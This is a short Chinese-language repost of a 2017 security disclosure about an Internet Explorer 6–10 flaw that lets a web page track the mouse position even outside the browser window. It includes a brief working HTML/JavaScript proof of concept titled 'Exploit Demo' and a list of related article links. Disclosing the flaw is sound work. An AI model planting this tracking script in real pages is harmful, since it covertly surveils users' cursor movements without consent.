IE6-10浏览器鼠标坐标跟踪安全风险
2017-11-09 15:27
246 查看
最近在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。
影响版本:IE6-10
Code:
影响版本:IE6-10
Code:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent("onload", function() {
var detector = document.getElementById("detector");
detector.attachEvent("onmousemove", function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent("onmousemove");
}, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- IE浏览器鼠标坐标跟踪安全风险,通杀全版本
- IE浏览器鼠标坐标跟踪安全风险,通杀全版本---IE的最大特色
- 跟踪鼠标在窗口上的坐标
- 关于IE6浏览器出现“你的安全设置不允许网站使用Active控件”
- JS+JQuery实现任意意嵌套的IFrame里鼠标相对于浏览器窗体坐标
- js 给div 添加选区,类似windows桌面选区一样,兼容ie6、7、8、9、10、Firefox、Google、所有浏览器
- IE下的一个安全BUG —— 可实时跟踪系统鼠标位置
- 取得浏览器当前鼠标的X,Y坐标的JavaScript脚本及document元素的一些重要属性
- MFC中用OpenCV显示图像,并跟踪鼠标显示图像的坐标与像素
- 实时显示鼠标指针相对于浏览器X轴Y轴坐标位置
- 用 javascript 获取鼠标(光标)的坐标位置 兼容IE/Firefox等浏览器
- 获取鼠标的坐标值(保证跨浏览器兼容)
- 关于在IE下的一个安全BUG --可用于跟踪用户的系统鼠标位置
- 浏览器的鼠标坐标值获取及pageX、clientX、screenX的差异
- selenium上滑动鼠标,浏览器接口不清零坐标参数
- js获取鼠标坐标位置兼容多个浏览器
- AutoLISP实时跟踪鼠标坐标
- IE下的一个安全BUG —— 可跟踪用户的系统鼠标位置
- js原生代码编写一个鼠标在页面移动坐标的检测功能,兼容各大浏览器